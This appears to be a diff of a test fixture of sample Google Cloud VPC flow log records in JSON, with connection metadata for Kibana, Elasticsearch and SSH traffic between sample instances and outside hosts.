-{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"203.0.113.58","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.0.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"203.0.113.58","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.12","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"203.0.113.58","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
-{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"203.0.113.134","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name
":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"67.43.156.13","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint 
Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint 
Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
